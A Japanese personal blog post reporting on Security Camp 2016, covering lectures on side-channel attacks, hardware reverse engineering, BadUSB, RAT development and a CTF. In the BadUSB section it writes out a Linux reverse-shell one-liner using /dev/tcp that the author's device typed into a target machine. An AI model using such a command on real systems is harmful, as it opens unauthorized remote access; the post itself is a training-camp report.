ブログ未満のなにか

ブログなのか誰にも分からない

セキュリティキャンプ2016 全国大会 参加報告・感想

はじめに

8月13日時点で、書きかけです。
ちゃんとしたものは、院試が終わってからになります。

院試が終わりました。結果はどこかで報告してると思います。
seccamp CTFのwriteupは、SANSやらgit challengeが終わってから別記事として挙げます。
(2016/08/18)

チーム名は「一対三」と書いて、「ゔぃむのかち」と読みます。
チーム4人の中で、Vim派が3人、Emacs派が1人だったのが由来です。


参加した講義一覧

各講義内容に関しては、後で書きます
ハードウェアよりなのはご愛嬌。

専門講義1:1-C 公開鍵暗号のハードウェア実装と攻撃~ICカードが持つ脆弱性とその対策~
専門講義2:2-B 謎マシンでNetBSDのクロス開発体験
専門講義3:3-B フィジカル・リバースエンジニアリング入門
専門講義4:4-C オンラインゲームアタック&ディフェンスチャレンジ
専門講義5:5-B USBメモリからブートしてみよう
専門講義6:6-B AVRマイコンで作るBadUSB自作
専門講義7:7-C 遠隔操作マルウェアと標的型攻撃からの防衛
公開鍵暗号のハードウェア実装と攻撃~ICカードが持つ脆弱性とその対策~

サイドチャネル攻撃を実践してみる講義。
サイドチャネル攻撃の学習用ボードを用いた演習で、RSAとAESの秘密鍵を解析した。
RSAは、計算する回路の違いから電圧に差が生じるので、オシロスコープを見ながら、鍵を推定した。
AESは、ノイズの影響が大きく、多量のサンプリングを取って解析した。サンプリングしたデータから、鍵を推定する過程は、元から用意されていたツールを使ったので、詳細は分からなかった。

サイドチャネル攻撃を知識としてしか知らなかったので、実践できたのがとても良かった。

謎マシンでNetBSDのクロス開発体験

VMNetBSDを動作させ、その上でRaspberry Piで動作するカーネルをビルドした。
僕の環境では、カーネルを書き換えて動作させたところ、dhcpdあたりで処理が止まってしまった。
LANケーブルを繋がないと、正常に処理が進んでいくので、dhcpdに関するビルドが失敗もしくはバグだと思う。

Raspberry Piをbaremetalさせるときに、クロスコンパイルを整備したことがあるが、NetBSDだととても簡単にできた(そもそもデフォルトで揃っていた?)。

フィジカル・リバースエンジニアリング入門

よく分からない基盤を渡され、そこから解析をしていく講義。
まずは、基盤上にあるチップの型番を調べ、リファレンスシートが探し、リファレンスシートを読みながら、UARTやJTAGがないか探した。
実際に、UARTからログを抜き出し、どのような情報があるのか調査した。
ROMの開始アドレスやサイズなどを調べた。

オンラインゲームアタック&ディフェンスチャレンジ

この講義が一番辛かった。
「Node.jsわからん!Web無理!」以上です。
精進します。

USBメモリからブートしてみよう

USBのMBRに命令書き込んで、OSを介さずにHello World!する講義。
講義資料として頂いた本の表紙が可愛い。

AVRマイコンで作るBadUSB自作

AVRマイコンを使って、BadUSBを作ってみる講義。AVRマイコンは、PS/2キーボードのキー入力をエミュレートし、PS/2-USB変換アダプターでPCに接続するといった感じ。

Windowsに対して、電源を落とすBasUSBを作った。
「Alt + F4」と「 Enter」を押すだけ。

Linux(もしくはそれに準ずる感じのOS)に対して、リバースシェルを貼るBadUSBも作った。
「sh -i >& /dev/tcp/10.0.0.1/8080 0>&1」を入力するだけ。

他の参加者の作ったBadUSBを見て回って、キーボードをエミュレートしてるだけでも、色々な事ができる事を知った。

遠隔操作マルウェアと標的型攻撃からの防衛

個人的に雲の上の存在だと思っていた凌さんの講義。他の講師に関しては、名前聞いた事あるなーぐらいしか思わなかったが、凌さんにお会いできた時は感動した。そもそも実在したんだとさえ思った。

ShinoBotでのマルウェア体験や、RAT(Remote Access Trojan / Remote Administration Tool)の開発をした。
無限CDトレー開き最高!

tweetは、マルウェア体験中にwebカメラで撮影されていたもの。


seccamp CTF

結果は、3位。
競技時間中に解けたのは3問。
放置したのが2問。
競技中はノータッチだったけど、あとからやってみて解けたのが2問でした。
競技中、インターネットに接続できなくて無限に辛かった。

競技用のイメージが配布されるらしいので、ある程度解いたらwriteup書きます。

f:id:hama7230:20160818130457j:plain:w300

グループワーク

結果は、ナイスファイト賞
たぶん、投票数的に次点。
内容は、YouTuberによるITモラルを伝える動画の配信
会場の笑いを取れたので満足した。
結構いいアイディアだったなと自画自賛してるのは内緒


f:id:hama7230:20160818130500j:plain:w300

感想

たのしかった。
あと煽られすぎた。理由のない唐突なプロはやめて

さいごに

参加者、チューター、講師、運営の皆様方のおかげで、とても楽しく刺激的な5日間でした。
本当にありがとうございました!
来年はチューターとして参加できるように、どんどんアウトプットしていきたいです。